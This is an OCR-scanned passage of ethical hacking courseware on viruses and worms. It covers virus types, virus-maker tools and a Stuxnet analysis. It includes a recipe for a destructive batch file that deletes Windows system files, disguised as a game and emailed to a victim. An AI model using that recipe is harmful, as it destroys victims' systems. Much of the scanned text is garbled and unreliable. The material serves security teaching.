W i t h e x t e n s i o n s a r e t u r n e d o f f , i f s o m e o n e s e n d s y o u a f i l e n a m e d B A D .T .T X T. T. VB VB S , y o u can only see BAD.TXT
Q
I f y o u h a v e f o r g o t t e n t h a t t h e e x t e n s i o n s a re re a c t u a l ly ly t u r n e d o f f , y o u m i g h t t h i n k t h is is is is a text file and open it
0
T h i s i s a n e x e c u t a b l e V i s u a l B a s ic ic S c r i p t v i r u s f i l e t h a t c o u l d d o s e r i o u s d a m a g e
T h e c o u n t e r m e a s u r e i s t o t u r n o f f " H i d e f i l e e x t e n s i o n s " i n W i n d o w s , as s h o w n i n th th e f o l l o w i n g screenshot:
Module 07 Page 1058
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
Folder Folder Option s General View
Search
Folder Folder views views You can apply the view (such as Detate or Icons) that you you are usng for this folder der to to al folders folders of ths type. Apply to Folders
Reset Folders
Advanced settngs Frfesand Folders H I Always Always show show icons, never thumb thumbnate nate ( ) Always show menus @ Display f
Cancel
App*y
FIGURE 7.17: Uncheck Hide File Extensions
Module 07 Page 1059
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
“ on and Intrusive Viruses Ad d -On Vir u s es
c EH
(crtifwd
IU mj I NMhM
Add-o dd-on n viru viruse ses appe ppend theircod theircode e to the host host code code without without ma making king any changes to the latter latt er or relocate relocate the host host code code to insert insert their own own code code at the beginning beginning Original Program Original Program Original Program
J.VMR..
I I I I I I I I I I I I I I I I I I I I viral code
Viruses
Original Program Original Program
Copyright © by E&Cauactl. All Rights Reserved. Reproduction Reproduction is Strictly Prohibited
A d d -o n a n d I n t r u s i v e V i r u s e s Add-on Viruses M o s t v i r u s e s a re r e a d d - o n v i ru ru s e s . Th T h i s t y p e o f v i r u s a p p e n d s i ts ts c o d e t o t h e b e g i n n i n g o f t h e h o s t c o d e w i t h o u t m a k i n g a n y c h a n g es es t o th t h e l a t t e r . T h u s, s, t h e v ir ir u s c o r r u p t s t h e s t a r t u p i n f o r m a t i o n o f t h e h o s t c o d e , a n d p l ac ac e s i t s e lf l f in in i ts ts p l ac ac e , b u t i t d o e s n o t t o u c h t h e h o s t c o d e. e. However, the virus code is executed before the host code. The only indication that the file is corrupted is that the size of the file has increased. Add-on
Viruses Original Program Original Program
1 1—
1
. .
^ ................................... ................ ...................................... ...................................... .......................... ....... JUMP.
FIGURE FIGUR E 7.18: Working of Add-on Add-on Viruses
Module 07 Page 1060
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
Intrusive Viruses I n tr t r u s iv iv e v i r us u s e s o v e r w r i t e t h e i r c o d e e i t h e r b y c o m p l e t e l y r e m o v i n g t h e t a r g e t h o s t't' s program code or sometimes overwriting only part of it. Therefore, the original code is not executed properly.
Original Program
Original Program
FIGURE 7.19: 7.19: Working of Intrusive Viruses Viruses
Module 07 Page 1061
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
Transient and Term inate and Stay St ay Residen t Viru ses
EH
Basic Infection Techniques
A
.
Direct Action or Transient Virus
J
the controls controls of the host code to where
Terminate and Stay Resident Virus (TSR)
f
Remains permanently in the memory during the
t
I] resides
J Selects the target targ et program to be modified and
J
^
_ _ _
^
entire enti re work wor k session session even even after the target host's program program is executed and terminated; can be removed only by
Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
T r a n s i e n t a n d T e r m i n a t e a n d S ta y R e s id e n t V i ru s e s Transient Viruses Transient viruses transfer all control to the host code where they reside, select the t a r g e t p r o g r a m t o b e m o d i f i e d , a n d c o r r u p t i t. t.
Term inate and Stay Stay Resident Virus (TSR) TSR viruses remain permanently in memory during the entire work session, even after t h e t a r g e t h o s t p r o g r a m is e x e c u t e d a nd n d t e r m i n a t e d . T h e y c an an b e r e m o v e d o n l y b y r e b o o t i n g the system.
Module 07 Page 1062
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
W riting riting a Sim ple Virus Program
C EH
Send the Game.co m file as an email attachment to a victim Create a batch file Game.bat with this text text
0 echo of of f del c: \ wi nnt \ syst em32\ *. * del c : \ wi nnt \ * . *
Convert the Game.bat batch file to Game.com using bat2com utility
When run it deletes core files in the WINNTdirec tory making Wind ows unusable ,
Copyright © by E&Caincil. All Rights Reserved. Reproduction is Strictly Prohibited.
W r it i t in i n g a S i m p l e V i ru ru s P r o g r a m -------
F o r d e m o n s t r a t i o n p u r p o s e s , a s i m p l e p r o g r a m t h a t c a n be be us us e d t o c a u s e h a r m t o a
t a r g e t s y s t e m i s s h o w n h e r e: e: 1.
C r e a te t e a b a t c h f i le le G a m e . b a t w i t h t h e f o l l o w i n g t e x t :
t ext @ ech echo of f del et e c : \ wi nnt \ s y st st em32\ * . * del et e c : \ wi nnt \ * . * 2.
C o n v e r t t h e G a m e . b a t b a tc t c h f i l e t o G a m e . c o m u s in in g t h e b a t 2 c o m u t i l i t y
3.
A s si si g n I c on o n t o G a m e . c o m u s i n g W i n d o w s f i l e p r o p e r t i e s s c re re e n
4.
S e nd nd t h e G a m e . c o m f i l e a s a n e m a i l a t t a c h m e n t t o a v i c t i m
5.
W h e n t h e v i c t i m r u n s t h i s p ro r o g r a m , i t d e l e t e s c o re re f i le le s in in t h e \ W I N N T d i r e c t o r y , m a k i n g Windows unusable
T h e v i c t i m w o u l d h a v e t o r e i n s t a l l W i n d o w s , c a u s in in g p r o b l e m s t o a l r e a d y sa s a v e d f i le le s .
Module 07 Page 1063
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Counterm easures Viruses Viruses and Worm s
Exam Exam 312-50 Certified Ethical Hacker
Terabit Terabit Virus M aker ••
!
.I
!
Disable Windows Security Center M Disable
^ H ^ id Opening Opening Copy,Move Copy,Move Window
|
Avoid Opening Gpedit ^
'M Disable Windows Them es
Avoid Opening Media Player |
|
Format All Hard Hard Drives Drives
Avoid Opening Mozilla Firefox ^
^
Funny Funny Keybo Keyboard ard
Avoid Opening MsConfig ^
|
F un un ny ny M o u se se
Avoid Opening Notepad ^
|
Funny Funny Start Start Button Button
M Avoid Opening Wordpad
M Gradually Gradually Fill Fill System Volume
Avoid Opening Opening Yahoo Messeng er ^
Disabl Disable e Windows Security Security Essenti Essentials als
Hide Desktop Icons
Add 30 User Accounts to Windows ^
M Hide Folder Option Menu
Always Clean Clipboard Clipboard ^
|
Always Log Off ^
|
Loc ck k A llll D r iv iv e s /o /o l d e rs rs
M Close Internet Explorer Every 10 Sec
0
Lock Internet Explorer Explorer Option Option Menu
M Delete All Files In Desktop
|
Delete All Files In My Documents ^ H
H id id e T a s kb kb a r
M u te te S ys ys t e m V o lu lu m e Open/Close CD-ROM Every 10 Sec
Delete Delete Windows Fonts
|
Delete Delete Windows Screen Savers
Wallpaper M Remove Desktop Wallpaper
Play Play Beep Sound Sound Every Sec Sec
f | Disconnect From Internet Internet
B Remove Run From Start Menu
Disable Automatic Updates ^
|
Remove Star Startt Butt Button on
Disable Disable Command Prompt ^
0
Remove Windows Clock Clock
Disable Printer
Slow Down PC Speed
Disable Regedit ^
f l Spread with Floppy Floppy , Folders
Disable Screen Saver ^
0
M Disable System Restore
M Swap Mouse Buttons
Disable Task Manager
Stop Stop SQL SQL Server Server
B Transparent Explorer Windows
Disable Windows Firewall ^
^
Disable Disable Wind ows Installer Installer ■
t f Turn Off Off Monitor Monitor
|| Qiaspiem uQ0m2
Turn off Computer After 5 Mm
■ lnLU °« COUJb COUJbCopyright Copyright © by E(
T e ra B IT V iru s M a k e r TeraBIT Virus Maker is a virus that is mostly detected by all antivirus software when s c a n n e d . Th Th i s v i r u s m o s t l y d o e s n ' t h a r m t h e PC, b u t i t c a n d i s a b l e t h e a n t i v i r u s t h a t is in in s t a l le le d on the system fo r a short time .
Module 07 Page 1064
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
•• TeraBn Virus Virus Maker 3. H
D i s ab ab l e W i n d o w s S ec ec u r i t y C e n t e r
M A v o i d O pe pe n i n g C o p y ,M ,M o v e W i n d o w
Avoid Opening Calculator
|
D i s ab ab l e W i n d o w s S e c u ri ri t y Es Es s e n t i a l s
H
jf l For ma t All Hard Dri ve s
H Avoid Opening Gpedit MAvoid Opening
H
J f D i s ab ab l e W i n d o w s T h e m e s
A v o i d Op Op e n i n g M e d i a Pl Pl a ye ye r Mozilla Mozilla Firefox
H
F u nn nn y K ey ey b o ar ar d
Avoid Opening MsConfig
H
Fu n n y M o u s e
Avoid Opening Notepad Notepad
^
F u nn nn y St St a r t B u t t o n
A v o i d Op Op e n i n g Wo Wo r d p a d
ft Gradually Fill System Volume
oo M e s s e n g e r 3 A v o i d O p e n i n g Y a h oo
J
Hi d e D e s k t o p I c o n s
M A d d J O U s e r Ac Ac c o u n t s t o W i n d o w s
M Hide Folder Option Option Menu
M A l w a y s C l e a n Cl Cl i p b o a r d
^
M A l w a y s L o g Of Of f
M L o c k A l l Dr Dr i v e s , Fo Fo l d e r s
|
C l o se se I n t e r n et et Ex Ex p l o re re r Ev Ev e r y
10Sec £ Lock
M Delete All Files Files In Deskt op M Delete All All Files In My Documents Delete Windows Fonts
0 Delete
Hi d e Ta s k b a r
Windows Screen Savers
R u n C u s to to m C o m m a n d
Int ernet Explore Explore r Option Option Menu
M M u t e Sy Sy s t e m Vo Vo l u m e J| Open/Close CD-RO CD-ROM M Every
'/I '/I Rem ove Desktop Wallpaper
M D i s c o nn nn e c t Fr Fr o m I n t e r n e t
^
^
D i s ab ab l e A u t o m a t i c Up Up d a t e s
H
R e m o v e St St a r t B u t t o n
B
D i sa sa b l e C o m m a n d P r o m p t
£
R e m ov ov e W i n d o w s Cl Cl o c k
|
Di s ab ab le le P ri ri n te te r
f
S l o w D o w n P C S pe pe e d
M Disable Regedit Regedit
0 Disable
Screen Saver
10Sec
R e m o v e R u n F r o m St St a r t Me Me n u
Cl Spread with Floppy, U S«>P SQL Server
Folders
D i s ab ab l e Sy Sy s t e m R es es t o r e
|
Q
D i s ab ab l e Ta Ta s k M a n ag ag e r
0
Tr a n s p a r e n t E x pl pl o r e r W i n d o w s
|
Tu r n of of f C Co o m p u t e r Af Af t e r
Disable Window s Installer
FieName After Instal
Fie Name Name
exe B
j f l Run V ir us wi t h Wi nd ow s
H
M D i s ab ab l e Wi Wi n d o w s F i r e w a l l
fake KB(s) to virus.
M Play Beep Sound Every Sec
S wa wa p M o u s e B ut ut t o n s
5Mi n
Tu r n Of f M o n i t o r
Create Virus About
xt
E
FIGURE 7.20: 7.20: TeraBIT Virus Virus M aker
Module 07 Page 1065
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
JPS Viru s M aker ak er a nd DELmE's Batch Virus M aker IPS( VirusMaker3.0)
nfectoo ?<0* |OVierO rOpbors\ Mtcelc lcnecus rrd| d| ®ectio ioofl 1SwapUwBjlons QiangeUserp«orrr a*nW *hUtgScx Open1 SpamLocalDak | S(> 304cDakT kT«a»| ResetT«ne SpaaParter | PbyWnXPSono NetSendSpam | *deUriffte CortoeFie&4en»3ns| BUeScreenO fDeih| HM eDocunertsFolder Hi*.\M .Pt | efctoAJT4M m Ofe•# •# DocM m| D Met•Ail Xm lFfaa | Delete M .M p3Ffe fea Me(• (•Al PhgM m| D elete M M beeFIm TheLa*Restart 1 DeMetW dl DeleteM yDocum ents1 s1 DeleteM yMunc ! l«”
0 FV»ta FV»ta< O LooOff
Vr*5A'lerIr^HI I
0 Turn Off
O Hibi biinofc nofco
0 No e
fl ServerNam oI^rdoTox^-H
DalateH PrfMm| Dalst«M** **>«| Delate*Is* *Is* M m| CraACcrpis | DcMeMyPcaun |
Frtocaio ionToD«*a*M *M g M ( (Mat•| •| \vd Mate | |ftrf Oalate||«nfl
0»W•N otepad Dea lte teCalculator | Dee lte teAcctm
OMttPvl IM-t.Uc•(
(M M•| D*»a | Mat•| Dalai•W o-d | Dea lte teOuloak \ 0**eSrf» |
wfiggyfeoycom 0 0 & com| w9
JP S V i r u s M a k e r
D EL EL m E ' s B a t c h V i r u s M a k e r
Copyright Copyright @by El rC lM Ki . All Rights Rights Reserved. Reproduct Reproduction ion is Strictly Prohibited. Prohibited.
J P S V i ru r u s M a k e r a n d D E L m E ' s B a tc t c h V i ru ru s M a k e r JP S V iru s M a k e r JPS Virus Maker is a tool to create viruses. It also has a feature to convert a v irus into a w o r m a n d c an a n b e u se se d t o d i s a b l e t h e n o r m a l h a r d w a r e o f t h e s y s t e m .
Module 07 Page 1066
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
3PS 3PS ( Virus Mak er 3.0 )
□ Hrie ServKet ServKet
Disable Re?sby □
Disabl Disable e MsCortig MsCortig
□
□
Disabl Disable e T at* Manage Manager r
□
H i de de O ut ut lo lo ok ok E * p t e u HdeWnd do o w s Cl Clo ck ck
□
D is is ab ab le le Ya Ya h oo oo
□
H i de de D e sk sk t op op Ic Ic o n *
□
D is is ab ab le le M e d a Pa Pa ^ e i
□
H i d e A IP IP i o c c es es s n T a sk sk mg mg i
□
Disable Internet Internet Explore! o re!
□
Hide Al Tasks n Taskmg Taskmgii
□
D is is ab ab le le T m e
Q H id id e R m
□
D is is ab ab le le Gk x «> Pokey
□
Change Change Explorer xplorer Captio Caption n
□
Disabl Disable e Wndow s Explo Explore rer r
□
C lear W n d o m X P
□
Disabl Disable e Norton Norton Anb Anb Vius
□
S w a p M o us us e B a t on on s
□
Disabl Disable e McAtee McAtee Anb Anb Vius Vius
□
Remove Fol Folder der Opt Option ionss
□
D is is ab ab le le N o te te P ad ad
□
Lock Mouse Mouse & Keyboa Keyboard rd
□
D is is ab ab le le W a d P ad ad
□
M u te te So So un un d
□ □
D is is ab ab le le W nd nd o w s D is is ab ab le le DH DH C P d e n t
□
A lw lw ay ay s C Df Df lO lO M
□
D is is a bl bl e Ta Ta s kb kb a i
□
C t aj aj y M ou ou se se
□
Disabl Disable e Start Start Butt Button on
□
Destroy Destroy Taskbat askbat
□
Disabl Disable e MSN Messe Messengei ngei
□
Destroy Destroy OIBne OIBness (VMessengetl (VMessengetl
□
D is is a bl bl e C MD MD
□
Destroy Destroy Protec Protected ted Stiotag Stiotage e
D is is ab ab le le S e c u i y C en en tte er
□
D e st st ro ro y A u do do S e r vi vi ce ce Destroy Destroy Clpboerd Clpboerd
O T u nO nO H M o n to to r
□
Disabl Disable e Syste System m Reside
□
□
Disabl Disable e Control Control Panel Panel
□
T e
□
Disabl Disable e Desktop Desktop Icons Icons
□
H id id e C u so so t
□
Disabl Disable e Saeen Save* Save*
□
A u to to St St a arr ttu up
O Restart Restart
O Log OH
Name After Instal: Rundi3;
O Tun OH
O Htmnate
Serve r Name:
O None
Sende1 .exe
JPS Vtn u M aker 3 0
FIGURE 7.21: JPS Viruse Maker Screenshot
D ELm E's Batc Batch h Virus Virus M aker ( / A
1
D E L m E ' s Ba B a t c h V ir ir u s M a k e r is a s im im p le le to t o o l t h a t a llll o w s y ou o u to t o c re r e at a t e y o u r o w n ch c h oi oi c e
of bat file viruses to suit your tasks. ^LJxj Oang Oa ng•• Uaar PaMword To qwarty I uaar *ujeememe" .Qwwfy
Sw p Mau—Buaong | Oang a Uwr Paa—o>d| w* Crtah Corrpa•
Sp—
• c t o<»t
VOxrat f t M •ct o M art ~%0>xn* >b* •ct o Mart 0\ >xr aM>bM • c t oHart *0\ »a a * M * toMart ' 0. *>>cra*f b« 9 C t K *tart ’ . O x X M h b M • c t oHart %0 “ >>cr »M1bM •cto Mart ~ XO»cr »* bM • c t o*art 0\ »aa * bM •ct o ■ art \ O»0 O»0 a#1 b« •ct o Hart *U)>xyaahbM •cto *tart " \ 0 » a W1M •cto •ct oMart %0 »cra#1 bal •cto itart “ %0»cr «#1 b «#1 ba« •cto •ct o Mart %0 »aa* 1 bM •ct o Mart “ %0>x7aM3bM •ct oMart %0 >x7a#t bat •cto •ct o Mart %0 »a*tf »a*t f t bai Mart crai hbal
HMSatoS HMSatoSg—
|
MagBoa | Opfv Ooe •
HfrVhaWa
|
H»B— cna| cna|
Bu iSa M nO ID i* I *da Docunarta FaUar I Oa>»• H OocFtea
Oalato alat oH Tm Hm |
CMcca*
CM•
0«— * PhgF PhgFlw lw | T>» La* Rx i
|
OMta% Oocu-rt Oocu-rt |
H * O Fte•
DM» H fa tftw
I
| Itwf |
I t* Ud P* Oafata afat a H Ptf FIaa DcMe M »*> »*>4F«m
| Oafc -* LrfcF rfcF—
Pa*al» Hal & | Cr»M>Compuar >Comp uar
0*i«%Humc
I
| CW k% Plcfc Plcfcw w
| | |
OriMtFMjp•
N o t Fie Ejecnaon ToOrtete leg'6 0
r^r 0Mart *“ XO>>^SyMamO v*‘-»\AUTO€ v* ‘-»\AUTO€XECRAT
******
puggJboT
VWwAq»w1rt rt |
►* j
•MW ytw twyco cow
Chang• How Pag•
goo^• co*H
Qpan Wab P«g»
FIGURE 7.22: DELmE's Batch Virus Maker Screenshot
Module 07 Page 1067
Ethical Ethical Hacking and Countermeasures C opyright © by EC-COlMCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
M od oduu le Flow
CEH
Virus and Worms Concepts
Types of Viruses
Penetration Testing
I Counter• measures
Malware A n al y s i s
Copyright © by E&Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
M o d u l e F lo lo w Prior to this, we
h a v e d i s c u s s e d v a r i o u s t y p e s o f v i r u s e s . N o w w e w i l l d i s c u ss ss
c o m p u t e r w o r m s a n d h o w t h e y a r e d i f f e r e n t f ro r o m v ir i r us u s e s. s.
Viru s an d W o r m s C o n c ep t
M a l w a r e A n al y s i s
T y p es o f Vi r u s es
C o u n t er m ea s u r es
<4 /
—
C o m p u te r W o rm s
^
)
P e n e t r a t i o n T e s t in in g
•V —
This section describes worms, worm analysis (Stuxnet), and a worm maker (Internet Worm M a k e r T h i n g ). ).
Module 07 Page 1068
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Counterm easures Viruses Viruses and Worm s
Exam Exam 312-50 Certified Ethical Hacker
C o m p u ter W o rm s
CEH
Computer worms are malicious programs that replicate, execute, and spread across the network connections independently without human interaction
Most of the worms are created only to replicate and spread across a network, consuming available computing computi ng resources; however, some some worms carry a payload to damage the host system
Atta Attack cke ers us use worm paylo payloa ad to insta install back backdo door ors s in infected computers, which turns them into zombies and creates botnet; these botnets can be used to carry further cyber attacks
0
Copyright © by EC-Cauactl.All Rights Reserved. Reproduction is Strictly Prohibited.
C o m p u te r W o rm s —
—
Computer worms are malicious programs that replicate, execute, and spread across
network connections independently, without human interaction. Most worms are created only to replicate and spread across a network, consuming available computing resources; however, s o m e w o r m s c a r r y a p a y lo lo a d t o d a m a g e t h e h o s t s ys y s t em em . A worm does not require a host to replicate, although in some cases one may argue that a w o r m ' s h o s t is i s t h e m a c h i n e i t ha ha s i n f e c t e d . W o r m s a r e a s u b t y p e o f v i r us us e s . W o r m s w e r e c o n s i d e re re d
m a i n ly ly
a m ainfram e
problem ,
but
after
most
of
th th e
w orld's
s y st st e m s w e r e
i n t e r c o n n e c t e d , w o r m s w e r e t a r g e t e d a g a i n st s t t h e W i n d o w s o p e r a t i n g s y s te te m , a n d w e r e s e n t t h r o u g h e m a i l , IR IRC, a n d o t h e r n e t w o r k f u n c t i o n s . A t t a c k e r s u s e w o r m p a y l o a d s t o i n s t a llll b a c k d o o r s in in i n f e c t e d c o m p u t e r s , w h i c h t u r n s t h e m i n t o zombies and creates botnet; these botnets can be used to carry out further cyber-attacks.
Module 07 Page 1069
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
How Is a W orm or m D ifferent if ferent from a Virus?
Replicat Replicat es on its ow n A worm takes advantage of file or information transport
A worm is a special type of virus that can replicate itself and use
features on computer systems and spreads through the infected network automatically
memory, but cannot attach itself to other programs programs
but a virus does not
Spreads through the Infected Network
4 • »\
\
Copyright © by EC-Cauactl. EC-Cauactl. All Rights Reserved. Reproduction Reproduction is Strictl y Prohibited.
H o w Is I s a W o r m D i ff f f e re r e n t f ro r o m a V i ru ru s ? V iru s
W o rm
A v i ru ru s i s a f i le le t h a t c a n n o t b e s p r e a d t o o t h e r
A worm, after being installed on a
c o m p u t e r s u n l e ss ss a n i n f e c t e d f i le le i s r e p l i c a t e d
system , can replicate itself and
a n d a c t u a lll l y s e nt nt t o t h e o t h e r c o m p u t e r ,
spread by using IRC, Outlook, or
w h e r e a s a w o r m d o es e s ju ju s t t h e o p p o s i t e .
other applicable mailing programs.
Files such as .com, .exe, or .sys, or a
A w o r m t y p i c a lll l y d oe oe s n o t m o d i f y
com bination of them are corrupted once the
any stored programs.
virus runs on the system. V i r us us e s a r e a l o t h a r d e r t o g e t o f f a n i n f e c t e d
As com pare d to a virus, a w orm can
machine.
be easily removed from the system.
T h e i r s p r e a d i n g o p t i o n s a r e m u c h l es es s t h a n
T h e y h a ve ve m o r e s p r e a d i n g o p t i o n s
that of a worm because viruses only infect
than a virus.
files on the machine. TABLE 7.1: 7.1: Difference betw een Virus and Worms
Module 07 Page 1070
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
W o rm A n a ly s is : S tu x n et 0
-
0
J The goal of Stuxnet Stuxnet is to sabotage sabotage that facili facility ty by reprogramming program programmable log logic controllers controllers (PLCs) to operate operate as the attackers inten intend d them to, most most likely likely out of their their specified cified boundaries boundaries
Stuxnet is is a threat thr eat targeting targeting a specif specific ic industr industrial ial control control system system like likely in i n Iran, Iran, suchas agas pipeline or power plant
0
0
Stuxnet contains m any features such as:
1
Self-replicates through removable drives exploiting a vulnerability allowing auto-execution auto-execution
Updates itself through a peer-to-peer mechanism within a LAN
2
Spreads in a LAN through a vulnerabilityinthe Windows Print Spooler
Exploits a total of four unpatched Microsoft vulnerabilities
Spreads through SMB by exploiting the Microsoft Windows Server Service RPC Handling Remote Code Execution Execution Vulnerability
8
Copies and executes itself on remote computers through network shares running a WinCC database server
Contacts a command command and control ser ver that allows the hacker to download download and execute code, including updated versions Contains a Windows rootkit that hide its binaries and attempts to bypass security products
Copies itself into Step 7 projects in such a way that it automatically executes when the Step 7 project is loaded
1 0
Fingerprints a specific industrial control system and modifies code on the Siemens PLCs PLCs to potentially sabotage the system h t t p : / / w w w . s y ma n t e c . c o m
Copyright © by EC-Cauactl.All Rights Reserved. Reproduction is Strictly Prohibited.
W o r m A n a ly s is : S t u x ne t Source: h t t p : / / w w w . s y m a n t e c . c o m S t u x n e t i s a c o m p l e x t h r e a t a n d m a l w a r e w i t h d i v e r s e m o d u l e s a n d f u n c t i o n a l i t i e s . T h is is is is mostly used to grab the control and reprogram industrial control systems (ICS) by modifying c o d e o n p r o g r a m m a b l e l o g i c c o n t r o l l e r s ( PL PL Cs Cs ), ), w h i c h c r e a t e a w a y f o r t h e a t t a c k e r t o i n t r u d e into the complete system and launch an attack by making changes in the code and take u n a u t h o r i z e d c o n t r o l o n t h e s y s te te m s w i t h o u t t h e k n o w l e d g e o f t h e o p e r a t o rs rs . S t u x n e t c o n t a i n s m a n y f e a t u r e s s u ch ch a s: s: e
S e l f - re re p l i c a te te s
throu gh
remo vable
drives
exploiting
a vulne rability
a l lo lo w i n g
auto-
execution Q
S p r ea ea d s i n a L A AN N throu gh a vu lnerab ility in the W ind ow s Print Spooler
Q
S p r ea e a d s t h r o u g h S M B b y e x p l o i t i n g t h e M i c r o s o f t W i n d o w s S e r v e r S e rv rv i ce ce RP RPC H a n d l i n g R e m o t e C o d e E x e c u t io io n V u l n e r a b i l i t y
©
C o p ie ie s a n d e x e c u te te s i ts ts e l f o n r e m o t e c o m p u t e r s t h r o u g h n e t w o r k s h ar ar e s r u n n i n g a WinCC database server
Module 07 Page 1071
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0linCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
9
Exam 312-50 Certified Ethical Hacker
C o p i e s i t s e l f i n t o S t e p 7 p r o j e c t s i n s u c h a w a y t h a t i t automa tically executes w h e n t h e Step 7 project is loaded
9
U p d a t e s i t s e l f t h r o u g h a p e e r - t o - p e e r m e c h a n i s m w i t h i n a LA LA N
9
E x p lo l o i ts ts a t o t a l o f f o u r u n p a t c h e d M i c r o s o f t vulnerabilities
9
Contacts a com m and
a n d c o n t r o l s e r v e r t h a t a l lo lo w s t h e h a c k e r t o d o w n l o a d
and
e x e c u t e c o d e , i n c l u d i n g u p d a t e d v e r s i on on s
9
Contains a Win do ws ro otk it that hide its its binaries and attempts to bypass bypass security products
9
F i n g e r p r i n t s a s p e c i f i c industrial control system a n d modifies code on the Siemens PLCs to potentially sabotage the system
Module
07
Page Page 1072
Ethical Hacking and Coun termea sures Copyright © by EC-COUIlCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Viruses Viruses and Worm s
Exam 312-50 Certified Ethical Hacker
W o rm A n a ly s is : S tu x n et (Cont’d)
When injecting injecting into into atr atrusted usted process, Stuxnet may keepthe the inject injected ed code in the trusted proce process or instruct instruct the the trusted process to inject inject the the code into another currentl currently y running process
CEH
Stuxnet consists of alarge a large .dll fil fi le that contains many different different exports and resources and two two encrypted configuration blocks
Whenever an export iscall is called ed, Stuxnet typically injects the entire DLLinto another another process and then jus just calls llsthe the partic rticu ular export
Thedropper component ofStuxnet ofStuxnet is is a wrapper programthat that contains all of the the above components stored stored inside itself itself in asec a section tion name "stub"
Stuxnet tuxnet hook hook Ntdll.dl tdll.dlll to monitor for dB*! requests to load specially cially crafted crafted file fi le < names; these speciall cially y craft crafted edfil fi lenames are mapped to another location ocation instea instead - al a location specified cified by W32.Stuxnet
q
When hen the threat is exec executed uted, the wrappe wrapper extracts the .dll file file from fromthe stub section, section, mapsit into memory as a module, and calls ll s one of the exports
q
It uses aspe a special method designed to to bypass behavior behavior blocking and host intrusi intrusion-protection on-protection based techno technologiesthat monitor LoadLibrary calls
W lH k tiH W http://www.symantec.com
Copyright © by E&Coincil. All Rights Reserved. Reproduction is Strictly Prohibited.
W o r m A n a l y s is i s : S t u xn x n e t (C ( C o n t ’d ’d ) Source: h t t p : / / w w w . s y m a n t e c . c o m Stuxnet consists of a large .dll file that contains many different exports and resources and two encrypte d co nfiguration
b l oc oc k s . It It h o o k s N t d l l . d l l t o m o n i t o r f o r r e q u e s t s t o l o a d s p e c ia ia l ly ly
crafted filenames; these specially crafted filenames are mapped to another location instead, a l o c a ti t i o n s p e c if i f ie i e d b y W 3 2 . S t u x n e t. t . T h e d r o p p e r c o m p o n e n t o f S t ux u x n e t is is a w r a p p e r p r o g r a m that contains all components stored inside itself in a section name "stub." When the threat is executed, the wrapper extracts the .dll file from the stub section, maps it into memory as a m o d u l e , a n d c a lll l s o n e o f t h e e x p o r t s . W h e n e v e r a n e x p o r t is i s c a l le le d , S t u x n e t t y p i c a l l y i n j e c ts ts t h e e n t i r e D LL in in t o a n o t h e r p r o c e s s a nd n d t h e n j u s t c al a l ls ls t h e p a r t i c u l a r e x p o r t . W h e n i n j e c t i n g i n t o a t r u s t e d p r oc o c e s s, s, S t u x n e t m a y k e e p t h e i n j e c t e d c o d e i n th t h e t r u s t e d p r o c es es s o r i n s t r u c t t h e trusted process to inject the code into another currently running process. It uses a special method designed to bypass behavior blocking and host intrusion-protection based technologies t h a t m o n i t o r L oa oa d L i b r a ry r y c al al ls ls .
Module 07 Page 1073
Ethical Ethical Hacking and Countermeasures C opyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Counterm easures Viruses Viruses and Worm s
Exam Exam 312-50 Certified Ethical Hacker
W o rm A n a ly s is : S tu x n et
c EH
(Cont’d) Check CFG
Infects removable drives
Infection Routine Flow
Inject in service, call export 32
fertNM [U*4 HakM
Infects Step 7 projects
Inject in Step 7 & call export 32
......... A.......... Create global mutexes
--------* -------Hides malicious files
Create rootkit service reg keys
Inject in Step 7 & call export 32
S e t file t im e s
Ex it
* Create global mutex Decrypt resource 201 & 242 & write to disk
Create.pnf & ■cfe files
Date<06/24/2012
Rootkit files V
>1
